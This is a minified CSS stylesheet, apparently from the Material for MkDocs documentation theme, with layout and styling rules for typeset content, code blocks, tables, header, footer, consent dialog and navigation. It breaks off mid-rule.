')}.md-typeset{-webkit-print-color-adjust:exact;color-adjust:exact;font-size:.8rem;line-height:1.6}@media print{.md-typeset{font-size:.68rem}}.md-typeset blockquote,.md-typeset dl,.md-typeset figure,.md-typeset ol,.md-typeset pre,.md-typeset ul{margin-bottom:1em;margin-top:1em}.md-typeset h1{color:var(--md-default-fg-color--light);font-size:2em;line-height:1.3;margin:0 0 1.25em}.md-typeset h1,.md-typeset h2{font-weight:300;letter-spacing:-.01em}.md-typeset h2{font-size:1.5625em;line-height:1.4;margin:1.6em 0 .64em}.md-typeset h3{font-size:1.25em;font-weight:400;letter-spacing:-.01em;line-height:1.5;margin:1.6em 0 .8em}.md-typeset h2+h3{margin-top:.8em}.md-typeset h4{font-weight:700;letter-spacing:-.01em;margin:1em 0}.md-typeset h5,.md-typeset h6{color:var(--md-default-fg-color--light);font-size:.8em;font-weight:700;letter-spacing:-.01em;margin:1.25em 0}.md-typeset h5{text-transform:uppercase}.md-typeset hr{border-bottom:.05rem solid var(--md-default-fg-color--lightest);display:flow-root;margin:1.5em 0}.md-typeset a{color:var(--md-typeset-a-color);word-break:break-word}.md-typeset a,.md-typeset a:before{transition:color 125ms}.md-typeset a:focus,.md-typeset a:hover{color:var(--md-accent-fg-color)}.md-typeset a:focus code,.md-typeset a:hover code{background-color:var(--md-accent-fg-color--transparent)}.md-typeset a code{color:currentcolor;transition:background-color 125ms}.md-typeset a.focus-visible{outline-color:var(--md-accent-fg-color);outline-offset:.2rem}.md-typeset code,.md-typeset kbd,.md-typeset pre{color:var(--md-code-fg-color);direction:ltr;font-variant-ligatures:none}@media print{.md-typeset code,.md-typeset kbd,.md-typeset pre{white-space:pre-wrap}}.md-typeset code{background-color:var(--md-code-bg-color);border-radius:.1rem;-webkit-box-decoration-break:clone;box-decoration-break:clone;font-size:.85em;padding:0 .2941176471em;word-break:break-word}.md-typeset code:not(.focus-visible){-webkit-tap-highlight-color:transparent;outline:none}.md-typeset pre{display:flow-root;line-height:1.4;position:relative}.md-typeset pre>code{-webkit-box-decoration-break:slice;box-decoration-break:slice;box-shadow:none;display:block;margin:0;outline-color:var(--md-accent-fg-color);overflow:auto;padding:.7720588235em 1.1764705882em;scrollbar-color:var(--md-default-fg-color--lighter) #0000;scrollbar-width:thin;touch-action:auto;word-break:normal}.md-typeset pre>code:hover{scrollbar-color:var(--md-accent-fg-color) #0000}.md-typeset pre>code::-webkit-scrollbar{height:.2rem;width:.2rem}.md-typeset pre>code::-webkit-scrollbar-thumb{background-color:var(--md-default-fg-color--lighter)}.md-typeset pre>code::-webkit-scrollbar-thumb:hover{background-color:var(--md-accent-fg-color)}.md-typeset kbd{background-color:var(--md-typeset-kbd-color);border-radius:.1rem;box-shadow:0 .1rem 0 .05rem var(--md-typeset-kbd-border-color),0 .1rem 0 var(--md-typeset-kbd-border-color),0 -.1rem .2rem var(--md-typeset-kbd-accent-color) inset;color:var(--md-default-fg-color);display:inline-block;font-size:.75em;padding:0 .6666666667em;vertical-align:text-top;word-break:break-word}.md-typeset mark{background-color:var(--md-typeset-mark-color);-webkit-box-decoration-break:clone;box-decoration-break:clone;color:inherit;word-break:break-word}.md-typeset abbr{border-bottom:.05rem dotted var(--md-default-fg-color--light);cursor:help;text-decoration:none}@media (hover:none){.md-typeset abbr[title]:focus:after,.md-typeset abbr[title]:hover:after{background-color:var(--md-default-fg-color);border-radius:.1rem;box-shadow:var(--md-shadow-z3);color:var(--md-default-bg-color);content:attr(title);font-size:.7rem;left:.8rem;margin-top:2em;padding:.2rem .3rem;position:absolute;right:.8rem}}.md-typeset small{opacity:.75}[dir=ltr] .md-typeset sub,[dir=ltr] .md-typeset sup{margin-left:.078125em}[dir=rtl] .md-typeset sub,[dir=rtl] .md-typeset sup{margin-right:.078125em}[dir=ltr] .md-typeset blockquote{padding-left:.6rem}[dir=rtl] .md-typeset blockquote{padding-right:.6rem}[dir=ltr] .md-typeset blockquote{border-left:.2rem solid var(--md-default-fg-color--lighter)}[dir=rtl] .md-typeset blockquote{border-right:.2rem solid var(--md-default-fg-color--lighter)}.md-typeset blockquote{color:var(--md-default-fg-color--light);margin-left:0;margin-right:0}.md-typeset ul{list-style-type:disc}[dir=ltr] .md-typeset ol,[dir=ltr] .md-typeset ul{margin-left:.625em}[dir=rtl] .md-typeset ol,[dir=rtl] .md-typeset ul{margin-right:.625em}.md-typeset ol,.md-typeset ul{padding:0}.md-typeset ol:not([hidden]),.md-typeset ul:not([hidden]){display:flow-root}.md-typeset ol ol,.md-typeset ul ol{list-style-type:lower-alpha}.md-typeset ol ol ol,.md-typeset ul ol ol{list-style-type:lower-roman}[dir=ltr] .md-typeset ol li,[dir=ltr] .md-typeset ul li{margin-left:1.25em}[dir=rtl] .md-typeset ol li,[dir=rtl] .md-typeset ul li{margin-right:1.25em}.md-typeset ol li,.md-typeset ul li{margin-bottom:.5em}.md-typeset ol li blockquote,.md-typeset ol li p,.md-typeset ul li blockquote,.md-typeset ul li p{margin:.5em 0}.md-typeset ol li:last-child,.md-typeset ul li:last-child{margin-bottom:0}[dir=ltr] .md-typeset ol li ol,[dir=ltr] .md-typeset ol li ul,[dir=ltr] .md-typeset ul li ol,[dir=ltr] .md-typeset ul li ul{margin-left:.625em}[dir=rtl] .md-typeset ol li ol,[dir=rtl] .md-typeset ol li ul,[dir=rtl] .md-typeset ul li ol,[dir=rtl] .md-typeset ul li ul{margin-right:.625em}.md-typeset ol li ol,.md-typeset ol li ul,.md-typeset ul li ol,.md-typeset ul li ul{margin-bottom:.5em;margin-top:.5em}[dir=ltr] .md-typeset dd{margin-left:1.875em}[dir=rtl] .md-typeset dd{margin-right:1.875em}.md-typeset dd{margin-bottom:1.5em;margin-top:1em}.md-typeset img,.md-typeset svg,.md-typeset video{height:auto;max-width:100%}.md-typeset img[align=left]{margin:1em 1em 1em 0}.md-typeset img[align=right]{margin:1em 0 1em 1em}.md-typeset img[align]:only-child{margin-top:0}.md-typeset figure{display:flow-root;margin:1em auto;max-width:100%;text-align:center;width:-webkit-fit-content;width:-moz-fit-content;width:fit-content}.md-typeset figure img{display:block}.md-typeset figcaption{font-style:italic;margin:1em auto;max-width:24rem}.md-typeset iframe{max-width:100%}.md-typeset table:not([class]){background-color:var(--md-default-bg-color);border:.05rem solid var(--md-typeset-table-color);border-radius:.1rem;display:inline-block;font-size:.64rem;max-width:100%;overflow:auto;touch-action:auto}@media print{.md-typeset table:not([class]){display:table}}.md-typeset table:not([class])+*{margin-top:1.5em}.md-typeset table:not([class]) td>:first-child,.md-typeset table:not([class]) th>:first-child{margin-top:0}.md-typeset table:not([class]) td>:last-child,.md-typeset table:not([class]) th>:last-child{margin-bottom:0}.md-typeset table:not([class]) td:not([align]),.md-typeset table:not([class]) th:not([align]){text-align:left}[dir=rtl] .md-typeset table:not([class]) td:not([align]),[dir=rtl] .md-typeset table:not([class]) th:not([align]){text-align:right}.md-typeset table:not([class]) th{font-weight:700;min-width:5rem;padding:.9375em 1.25em;vertical-align:top}.md-typeset table:not([class]) td{border-top:.05rem solid var(--md-typeset-table-color);padding:.9375em 1.25em;vertical-align:top}.md-typeset table:not([class]) tbody tr{transition:background-color 125ms}.md-typeset table:not([class]) tbody tr:hover{background-color:var(--md-typeset-table-color--light);box-shadow:0 .05rem 0 var(--md-default-bg-color) inset}.md-typeset table:not([class]) a{word-break:normal}.md-typeset table th[role=columnheader]{cursor:pointer}[dir=ltr] .md-typeset table th[role=columnheader]:after{margin-left:.5em}[dir=rtl] .md-typeset table th[role=columnheader]:after{margin-right:.5em}.md-typeset table th[role=columnheader]:after{content:"";display:inline-block;height:1.2em;-webkit-mask-image:var(--md-typeset-table-sort-icon);mask-image:var(--md-typeset-table-sort-icon);-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;transition:background-color 125ms;vertical-align:text-bottom;width:1.2em}.md-typeset table th[role=columnheader]:hover:after{background-color:var(--md-default-fg-color--lighter)}.md-typeset table th[role=columnheader][aria-sort=ascending]:after{background-color:var(--md-default-fg-color--light);-webkit-mask-image:var(--md-typeset-table-sort-icon--asc);mask-image:var(--md-typeset-table-sort-icon--asc)}.md-typeset table th[role=columnheader][aria-sort=descending]:after{background-color:var(--md-default-fg-color--light);-webkit-mask-image:var(--md-typeset-table-sort-icon--desc);mask-image:var(--md-typeset-table-sort-icon--desc)}.md-typeset__scrollwrap{margin:1em -.8rem;overflow-x:auto;touch-action:auto}.md-typeset__table{display:inline-block;margin-bottom:.5em;padding:0 .8rem}@media print{.md-typeset__table{display:block}}html .md-typeset__table table{display:table;margin:0;overflow:hidden;width:100%}@media screen and (max-width:44.9375em){.md-content__inner>pre{margin:1em -.8rem}.md-content__inner>pre code{border-radius:0}}.md-banner{background-color:var(--md-footer-bg-color);color:var(--md-footer-fg-color);overflow:auto}@media print{.md-banner{display:none}}.md-banner--warning{background-color:var(--md-warning-bg-color);color:var(--md-warning-fg-color)}.md-banner__inner{font-size:.7rem;margin:.6rem auto;padding:0 .8rem}[dir=ltr] .md-banner__button{float:right}[dir=rtl] .md-banner__button{float:left}.md-banner__button{color:inherit;cursor:pointer;transition:opacity .25s}.md-banner__button:hover{opacity:.7}html{font-size:125%;height:100%;overflow-x:hidden}@media screen and (min-width:100em){html{font-size:137.5%}}@media screen and (min-width:125em){html{font-size:150%}}body{background-color:var(--md-default-bg-color);display:flex;flex-direction:column;font-size:.5rem;min-height:100%;position:relative;width:100%}@media print{body{display:block}}@media screen and (max-width:59.9375em){body[data-md-scrolllock]{position:fixed}}.md-grid{margin-left:auto;margin-right:auto;max-width:61rem}.md-container{display:flex;flex-direction:column;flex-grow:1}@media print{.md-container{display:block}}.md-main{flex-grow:1}.md-main__inner{display:flex;height:100%;margin-top:1.5rem}.md-ellipsis{overflow:hidden;text-overflow:ellipsis}.md-toggle{display:none}.md-option{height:0;opacity:0;position:absolute;width:0}.md-option:checked+label:not([hidden]){display:block}.md-option.focus-visible+label{outline-color:var(--md-accent-fg-color);outline-style:auto}.md-skip{background-color:var(--md-default-fg-color);border-radius:.1rem;color:var(--md-default-bg-color);font-size:.64rem;margin:.5rem;opacity:0;outline-color:var(--md-accent-fg-color);padding:.3rem .5rem;position:fixed;transform:translateY(.4rem);z-index:-1}.md-skip:focus{opacity:1;transform:translateY(0);transition:transform .25s cubic-bezier(.4,0,.2,1),opacity 175ms 75ms;z-index:10}@page{margin:25mm}:root{--md-clipboard-icon:url('data:image/svg+xml;charset=utf-8,
')}.md-clipboard{border-radius:.1rem;color:var(--md-default-fg-color--lightest);cursor:pointer;height:1.5em;outline-color:var(--md-accent-fg-color);outline-offset:.1rem;position:absolute;right:.5em;top:.5em;transition:color .25s;width:1.5em;z-index:1}@media print{.md-clipboard{display:none}}.md-clipboard:not(.focus-visible){-webkit-tap-highlight-color:transparent;outline:none}:hover>.md-clipboard{color:var(--md-default-fg-color--light)}.md-clipboard:focus,.md-clipboard:hover{color:var(--md-accent-fg-color)}.md-clipboard:after{background-color:currentcolor;content:"";display:block;height:1.125em;margin:0 auto;-webkit-mask-image:var(--md-clipboard-icon);mask-image:var(--md-clipboard-icon);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;width:1.125em}.md-clipboard--inline{cursor:pointer}.md-clipboard--inline code{transition:color .25s,background-color .25s}.md-clipboard--inline:focus code,.md-clipboard--inline:hover code{background-color:var(--md-accent-fg-color--transparent);color:var(--md-accent-fg-color)}@keyframes consent{0%{opacity:0;transform:translateY(100%)}to{opacity:1;transform:translateY(0)}}@keyframes overlay{0%{opacity:0}to{opacity:1}}.md-consent__overlay{animation:overlay .25s both;-webkit-backdrop-filter:blur(.1rem);backdrop-filter:blur(.1rem);background-color:#0000008a;height:100%;opacity:1;position:fixed;top:0;width:100%;z-index:5}.md-consent__inner{animation:consent .5s cubic-bezier(.1,.7,.1,1) both;background-color:var(--md-default-bg-color);border:0;border-radius:.1rem;bottom:0;box-shadow:0 0 .2rem #0000001a,0 .2rem .4rem #0003;max-height:100%;overflow:auto;padding:0;position:fixed;width:100%;z-index:5}.md-consent__form{padding:.8rem}.md-consent__settings{display:none;margin:1em 0}input:checked+.md-consent__settings{display:block}.md-consent__controls{margin-bottom:.8rem}.md-typeset .md-consent__controls .md-button{display:inline}@media screen and (max-width:44.9375em){.md-typeset .md-consent__controls .md-button{display:block;margin-top:.4rem;text-align:center;width:100%}}.md-consent label{cursor:pointer}.md-content{flex-grow:1;min-width:0}.md-content__inner{margin:0 .8rem 1.2rem;padding-top:.6rem}@media screen and (min-width:76.25em){[dir=ltr] .md-sidebar--primary:not([hidden])~.md-content>.md-content__inner{margin-left:1.2rem}[dir=ltr] .md-sidebar--secondary:not([hidden])~.md-content>.md-content__inner,[dir=rtl] .md-sidebar--primary:not([hidden])~.md-content>.md-content__inner{margin-right:1.2rem}[dir=rtl] .md-sidebar--secondary:not([hidden])~.md-content>.md-content__inner{margin-left:1.2rem}}.md-content__inner:before{content:"";display:block;height:.4rem}.md-content__inner>:last-child{margin-bottom:0}[dir=ltr] .md-content__button{float:right}[dir=rtl] .md-content__button{float:left}[dir=ltr] .md-content__button{margin-left:.4rem}[dir=rtl] .md-content__button{margin-right:.4rem}.md-content__button{margin:.4rem 0;padding:0}@media print{.md-content__button{display:none}}.md-typeset .md-content__button{color:var(--md-default-fg-color--lighter)}.md-content__button svg{display:inline;vertical-align:top}[dir=rtl] .md-content__button svg{transform:scaleX(-1)}[dir=ltr] .md-dialog{right:.8rem}[dir=rtl] .md-dialog{left:.8rem}.md-dialog{background-color:var(--md-default-fg-color);border-radius:.1rem;bottom:.8rem;box-shadow:var(--md-shadow-z3);min-width:11.1rem;opacity:0;padding:.4rem .6rem;pointer-events:none;position:fixed;transform:translateY(100%);transition:transform 0ms .4s,opacity .4s;z-index:4}@media print{.md-dialog{display:none}}.md-dialog--active{opacity:1;pointer-events:auto;transform:translateY(0);transition:transform .4s cubic-bezier(.075,.85,.175,1),opacity .4s}.md-dialog__inner{color:var(--md-default-bg-color);font-size:.7rem}.md-feedback{margin:2em 0 1em;text-align:center}.md-feedback fieldset{border:none;margin:0;padding:0}.md-feedback__title{font-weight:700;margin:1em auto}.md-feedback__inner{position:relative}.md-feedback__list{align-content:baseline;display:flex;flex-wrap:wrap;justify-content:center;position:relative}.md-feedback__list:hover .md-icon:not(:disabled){color:var(--md-default-fg-color--lighter)}:disabled .md-feedback__list{min-height:1.8rem}.md-feedback__icon{color:var(--md-default-fg-color--light);cursor:pointer;flex-shrink:0;margin:0 .1rem;transition:color 125ms}.md-feedback__icon:not(:disabled).md-icon:hover{color:var(--md-accent-fg-color)}.md-feedback__icon:disabled{color:var(--md-default-fg-color--lightest);pointer-events:none}.md-feedback__note{opacity:0;position:relative;transform:translateY(.4rem);transition:transform .4s cubic-bezier(.1,.7,.1,1),opacity .15s}.md-feedback__note>*{margin:0 auto;max-width:16rem}:disabled .md-feedback__note{opacity:1;transform:translateY(0)}.md-footer{background-color:var(--md-footer-bg-color);color:var(--md-footer-fg-color)}@media print{.md-footer{display:none}}.md-footer__inner{justify-content:space-between;overflow:auto;padding:.2rem}.md-footer__inner:not([hidden]){display:flex}.md-footer__link{align-items:end;display:flex;flex-grow:0.01;margin-bottom:.4rem;margin-top:1rem;max-width:100%;outline-color:var(--md-accent-fg-color);overflow:hidden;transition:opacity .25s}.md-footer__link:focus,.md-footer__link:hover{opacity:.7}[dir=rtl] .md-footer__link svg{transform:scaleX(-1)}@media screen and (max-width:44.9375em){.md-footer__link--prev{flex-shrink:0}.md-footer__link--prev .md-footer__title{display:none}}[dir=ltr] .md-footer__link--next{margin-left:auto}[dir=rtl] .md-footer__link--next{margin-right:auto}.md-footer__link--next{text-align:right}[dir=rtl] .md-footer__link--next{text-align:left}.md-footer__title{flex-grow:1;font-size:.9rem;margin-bottom:.7rem;max-width:calc(100% - 2.4rem);padding:0 1rem;white-space:nowrap}.md-footer__button{margin:.2rem;padding:.4rem}.md-footer__direction{font-size:.64rem;opacity:.7}.md-footer-meta{background-color:var(--md-footer-bg-color--dark)}.md-footer-meta__inner{display:flex;flex-wrap:wrap;justify-content:space-between;padding:.2rem}html .md-footer-meta.md-typeset a{color:var(--md-footer-fg-color--light)}html .md-footer-meta.md-typeset a:focus,html .md-footer-meta.md-typeset a:hover{color:var(--md-footer-fg-color)}.md-copyright{color:var(--md-footer-fg-color--lighter);font-size:.64rem;margin:auto .6rem;padding:.4rem 0;width:100%}@media screen and (min-width:45em){.md-copyright{width:auto}}.md-copyright__highlight{color:var(--md-footer-fg-color--light)}.md-social{margin:0 .4rem;padding:.2rem 0 .6rem}@media screen and (min-width:45em){.md-social{padding:.6rem 0}}.md-social__link{display:inline-block;height:1.6rem;text-align:center;width:1.6rem}.md-social__link:before{line-height:1.9}.md-social__link svg{fill:currentcolor;max-height:.8rem;vertical-align:-25%}.md-typeset .md-button{border:.1rem solid;border-radius:.1rem;color:var(--md-primary-fg-color);cursor:pointer;display:inline-block;font-weight:700;padding:.625em 2em;transition:color 125ms,background-color 125ms,border-color 125ms}.md-typeset .md-button--primary{background-color:var(--md-primary-fg-color);border-color:var(--md-primary-fg-color);color:var(--md-primary-bg-color)}.md-typeset .md-button:focus,.md-typeset .md-button:hover{background-color:var(--md-accent-fg-color);border-color:var(--md-accent-fg-color);color:var(--md-accent-bg-color)}[dir=ltr] .md-typeset .md-input{border-top-left-radius:.1rem}[dir=ltr] .md-typeset .md-input,[dir=rtl] .md-typeset .md-input{border-top-right-radius:.1rem}[dir=rtl] .md-typeset .md-input{border-top-left-radius:.1rem}.md-typeset .md-input{border-bottom:.1rem solid var(--md-default-fg-color--lighter);box-shadow:var(--md-shadow-z1);font-size:.8rem;height:1.8rem;padding:0 .6rem;transition:border .25s,box-shadow .25s}.md-typeset .md-input:focus,.md-typeset .md-input:hover{border-bottom-color:var(--md-accent-fg-color);box-shadow:var(--md-shadow-z2)}.md-typeset .md-input--stretch{width:100%}.md-header{background-color:var(--md-primary-fg-color);box-shadow:0 0 .2rem #0000,0 .2rem .4rem #0000;color:var(--md-primary-bg-color);display:block;left:0;position:sticky;right:0;top:0;z-index:4}@media print{.md-header{display:none}}.md-header[hidden]{transform:translateY(-100%);transition:transform .25s cubic-bezier(.8,0,.6,1),box-shadow .25s}.md-header--shadow{box-shadow:0 0 .2rem #0000001a,0 .2rem .4rem #0003;transition:transform .25s cubic-bezier(.1,.7,.1,1),box-shadow .25s}.md-header__inner{align-items:center;display:flex;padding:0 .2rem}.md-header__button{color:currentcolor;cursor:pointer;margin:.2rem;outline-color:var(--md-accent-fg-color);padding:.4rem;position:relative;transition:opacity .25s;vertical-align:middle;z-index:1}.md-header__button:hover{opacity:.7}.md-header__button:not([hidden]){display:inline-block}.md-header__button:not(.focus-visible){-webkit-tap-highlight-color:transparent;outline:none}.md-header__button.md-logo{margin:.2rem;padding:.4rem}@media screen and (max-width:76.1875em){.md-header__button.md-logo{display:none}}.md-header__button.md-logo img,.md-header__button.md-logo svg{fill:currentcolor;display:block;height:1.2rem;width:auto}@media screen and (min-width:60em){.md-header__button[for=__search]{display:none}}.no-js .md-header__button[for=__search]{display:none}[dir=rtl] .md-header__button[for=__search] svg{transform:scaleX(-1)}@media screen and (min-width:76.25em){.md-header__button[for=__drawer]{display:none}}.md-header__topic{display:flex;max-width:100%;position:absolute;transition:transform .4s cubic-bezier(.1,.7,.1,1),opacity .15s;white-space:nowrap}.md-header__topic+.md-header__topic{opacity:0;pointer-events:none;transform:translateX(1.25rem);transition:transform .4s cubic-bezier(1,.7,.1,.1),opacity .15s;z-index:-1}[dir=rtl] .md-header__topic+.md-header__topic{transform:translateX(-1.25rem)}.md-header__topic:first-child{font-weight:700}[dir=ltr] .md-header__title{margin-left:1rem}[dir=rtl] .md-header__title{margin-right:1rem}[dir=ltr] .md-header__title{margin-right:.4rem}[dir=rtl] .md-header__title{margin-left:.4rem}.md-header__title{flex-grow:1;font-size:.9rem;height:2.4rem;line-height:2.4rem}.md-header__title--active .md-header__topic{opacity:0;pointer-events:none;transform:translateX(-1.25rem);transition:transform .4s cubic-bezier(1,.7,.1,.1),opacity .15s;z-index:-1}[dir=rtl] .md-header__title--active .md-header__topic{transform:translateX(1.25rem)}.md-header__title--active .md-header__topic+.md-header__topic{opacity:1;pointer-events:auto;transform:translateX(0);transition:transform .4s cubic-bezier(.1,.7,.1,1),opacity .15s;z-index:0}.md-header__title>.md-header__ellipsis{height:100%;position:relative;width:100%}.md-header__option{display:flex;flex-shrink:0;max-width:100%;transition:max-width 0ms .25s,opacity .25s .25s;white-space:nowrap}[data-md-toggle=search]:checked~.md-header .md-header__option{max-width:0;opacity:0;transition:max-width 0ms,opacity 0ms}.md-header__source{display:none}@media screen and (min-width:60em){[dir=ltr] .md-header__source{margin-left:1rem}[dir=rtl] .md-header__source{margin-right:1rem}.md-header__source{display:block;max-width:11.7rem;width:11.7rem}}@media screen and (min-width:76.25em){[dir=ltr] .md-header__source{margin-left:1.4rem}[dir=rtl] .md-header__source{margin-right:1.4rem}}:root{--md-nav-icon--prev:url('data:image/svg+xml;charset=utf-8,
');--md-nav-icon--next:url('data:image/svg+xml;charset=utf-8,
');--md-toc-icon:url('data:image/svg+xml;charset=utf-8,
')}.md-nav{font-size:.7rem;line-height:1.3}.md-nav__title{color:var(--md-default-fg-color--light);display:block;font-weight:700;overflow:hidden;padding:0 .6rem;text-overflow:ellipsis}.md-nav__title .md-nav__button{display:none}.md-nav__title .md-nav__button img{height:100%;width:auto}.md-nav__title .md-nav__button.md-logo img,.md-nav__title .md-nav__button.md-logo svg{fill:currentcolor;display:block;height:2.4rem;max-width:100%;object-fit:contain;width:auto}.md-nav__list{list-style:none;margin:0;padding:0}.md-nav__item{padding:0 .6rem}[dir=ltr] .md-nav__item .md-nav__item{padding-right:0}[dir=rtl] .md-nav__item .md-nav__item{padding-left:0}.md-nav__link{align-items:center;cursor:pointer;display:flex;justify-content:space-between;margin-top:.625em;overflow:hidden;scroll-snap-align:start;text-overflow:ellipsis;transition:color 125ms}.md-nav__link--passed{color:var(--md-default-fg-color--light)}.md-nav__item .md-nav__link--active{color:var(--md-typeset-a-color)}.md-nav__item .md-nav__link--index [href]{width:100%}.md-nav__link:focus,.md-nav__link:hover{color:var(--md-accent-fg-color)}.md-nav__link.focus-visible{outline-color:var(--md-accent-fg-color);outline-offset:.2rem}.md-nav--primary .md-nav__link[for=__toc]{display:none}.md-nav--primary .md-nav__link[for=__toc] .md-icon:after{background-color:currentcolor;display:block;height:100%;-webkit-mask-image:var(--md-toc-icon);mask-image:var(--md-toc-icon);width:100%}.md-nav--primary .md-nav__link[for=__toc]~.md-nav{display:none}.md-nav__link>*{cursor:pointer;display:flex}.md-nav__icon{flex-shrink:0}.md-nav__source{display:none}@media screen and (max-width:76.1875em){.md-nav--primary,.md-nav--primary .md-nav{background-color:var(--md-default-bg-color);display:flex;flex-direction:column;height:100%;left:0;position:absolute;right:0;top:0;z-index:1}.md-nav--primary .md-nav__item,.md-nav--primary .md-nav__title{font-size:.8rem;line-height:1.5}.md-nav--primary .md-nav__title{background-color:var(--md-default-fg-color--lightest);color:var(--md-default-fg-color--light);cursor:pointer;height:5.6rem;line-height:2.4rem;padding:3rem .8rem .2rem;position:relative;white-space:nowrap}[dir=ltr] .md-nav--primary .md-nav__title .md-nav__icon{left:.4rem}[dir=rtl] .md-nav--primary .md-nav__title .md-nav__icon{right:.4rem}.md-nav--primary .md-nav__title .md-nav__icon{display:block;height:1.2rem;margin:.2rem;position:absolute;top:.4rem;width:1.2rem}.md-nav--primary .md-nav__title .md-nav__icon:after{background-color:currentcolor;content:"";display:block;height:100%;-webkit-mask-image:var(--md-nav-icon--prev);mask-image:var(--md-nav-icon--prev);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;width:100%}.md-nav--primary .md-nav__title~.md-nav__list{background-color:var(--md-default-bg-color);box-shadow:0 .05rem 0 var(--md-default-fg-color--lightest) inset;overflow-y:auto;scroll-snap-type:y mandatory;touch-action:pan-y}.md-nav--primary .md-nav__title~.md-nav__list>:first-child{border-top:0}.md-nav--primary .md-nav__title[for=__drawer]{background-color:var(--md-primary-fg-color);color:var(--md-primary-bg-color);font-weight:700}.md-nav--primary .md-nav__title .md-logo{display:block;left:.2rem;margin:.2rem;padding:.4rem;position:absolute;right:.2rem;top:.2rem}.md-nav--primary .md-nav__list{flex:1}.md-nav--primary .md-nav__item{border-top:.05rem solid var(--md-default-fg-color--lightest);padding:0}.md-nav--primary .md-nav__item--active>.md-nav__link{color:var(--md-typeset-a-color)}.md-nav--primary .md-nav__item--active>.md-nav__link:focus,.md-nav--primary .md-nav__item--active>.md-nav__link:hover{color:var(--md-accent-fg-color)}.md-nav--primary .md-nav__link{margin-top:0;padding:.6rem .8rem}[dir=ltr] .md-nav--primary .md-nav__link .md-nav__icon{margin-right:-.2rem}[dir=rtl] .md-nav--primary .md-nav__link .md-nav__icon{margin-left:-.2rem}.md-nav--primary .md-nav__link .md-nav__icon{font-size:1.2rem;height:1.2rem;width:1.2rem}.md-nav--primary .md-nav__link .md-nav__icon:after{background-color:currentcolor;content:"";display:block;height:100%;-webkit-mask-image:var(--md-nav-icon--next);mask-image:var(--md-nav-icon--next);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;width:100%}[dir=rtl] .md-nav--primary .md-nav__icon:after{transform:scale(-1)}.md-nav--primary .md-nav--secondary .md-nav{background-color:initial;position:static}[dir=ltr] .md-nav--primary .md-nav--secondary .md-nav .md-nav__link{padding-left:1.4rem}[dir=rtl] .md-nav--primary .md-nav--secondary .md-nav .md-nav__link{padding-right:1.4rem}[dir=ltr] .md-nav--primary .md-nav--secondary .md-nav .md-nav .md-nav__link{padding-left:2rem}[dir=rtl] .md-nav--primary .md-nav--secondary .md-nav .md-nav .md-nav__link{padding-right:2rem}[dir=ltr] .md-nav--primary .md-nav--secondary .md-nav .md-nav .md-nav .md-nav__link{padding-left:2.6rem}[dir=rtl] .md-nav--primary .md-nav--secondary .md-nav .md-nav .md-nav .md-nav__link{padding-right:2.6rem}[dir=ltr] .md-nav--primary .md-nav--secondary .md-nav .md-nav .md-nav .md-nav .md-nav__link{padding-left:3.2rem}[dir=rtl] .md-nav--primary .md-nav--secondary .md-nav .md-nav .md-nav .md-nav .md-nav__link{padding-right:3.2rem}.md-nav--secondary{background-color:initial}.md-nav__toggle~.md-nav{display:flex;opacity:0;transform:translateX(100%);transition:transform .25s cubic-bezier(.8,0,.6,1),opacity 125ms 50ms}[dir=rtl] .md-nav__toggle~.md-nav{transform:translateX(-100%)}.md-nav__toggle:checked~.md-nav{opacity:1;transform:translateX(0);transition:transform .25s cubic-bezier(.4,0,.2,1),opacity 125ms 125ms}.md-nav__toggle:checked~.md-nav>.md-nav__list{-webkit-backface-visibility:hidden;backface-visibility:hidden}}@media screen and (max-width:59.9375em){.md-nav--primary .md-nav__link[for=__toc]{display:flex}.md-nav--primary .md-nav__link[for=__toc] .md-icon:after{content:""}.md-nav--primary .md-nav__link[for=__toc]+.md-nav__link{display:none}.md-nav--primary .md-nav__link[for=__toc]~.md-nav{display:flex}.md-nav__source{background-color:var(--md-primary-fg-color--dark);color:var(--md-primary-bg-color);display:block;padding:0 .2rem}}@media screen and (min-width:60em) and (max-width:76.1875em){.md-nav--integrated .md-nav__link[for=__toc]{display:flex}.md-nav--integrated .md-nav__link[for=__toc] .md-icon:after{content:""}.md-nav--integrated .md-nav__link[for=__toc]+.md-nav__link{display:none}.md-nav--integrated .md-nav__link[for=__toc]~.md-nav{display:flex}}@media screen and (min-width:60em){.md-nav--secondary .md-nav__title{background:var(--md-default-bg-color);box-shadow:0 0 .4rem .4rem var(--md-default-bg-color);position:sticky;top:0;z-index:1}.md-nav--secondary .md-nav__title[for=__toc]{scroll-snap-align:start}.md-nav--secondary .md-nav__title .md-nav__icon{display:none}}@media screen and (min-width:76.25em){.md-nav{transition:max-height .25s cubic-bezier(.86,0,.07,1)}.md-nav--primary .md-nav__title{background:var(--md-default-bg-color);box-shadow:0 0 .4rem .4rem var(--md-default-bg-color);position:sticky;top:0;z-index:1}.md-nav--primary .md-nav__title[for=__drawer]{scroll-snap-align:start}.md-nav--primary .md-nav__title .md-nav__icon,.md-nav__toggle~.md-nav{display:none}.md-nav__toggle:checked~.md-nav,.md-nav__toggle:indeterminate~.md-nav{display:block}.md-nav__item--nested>.md-nav>.md-nav__title{display:none}.md-nav__item--section{display:block;margin:1.25em 0}.md-nav__item--section:last-child{margin-bottom:0}.md-nav__item--section>.md-nav__link{font-weight:700;pointer-events:none}.md-nav__item--section>.md-nav__link[for]{color:var(--md-default-fg-color--light)}.md-nav__item--section>.md-nav__link--index [href]{pointer-events:auto}.md-nav__item--section>.md-nav__link .md-nav__icon{display:none}.md-nav__item--section>.md-nav{display:block}.md-nav__item--section>.md-nav>.md-nav__list>.md-nav__item{padding:0}.md-nav__icon{border-radius:100%;height:.9rem;transition:background-color .25s;width:.9rem}.md-nav__icon:hover{background-color:var(--md-accent-fg-color--transparent)}.md-nav__icon:after{background-color:currentcolor;border-radius:100%;content:"";display:inline-block;height:100%;-webkit-mask-image:var(--md-nav-icon--next);mask-image:var(--md-nav-icon--next);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;transition:transform .25s;vertical-align:-.1rem;width:100%}[dir=rtl] .md-nav__icon:after{transform:rotate(180deg)}.md-nav__item--nested 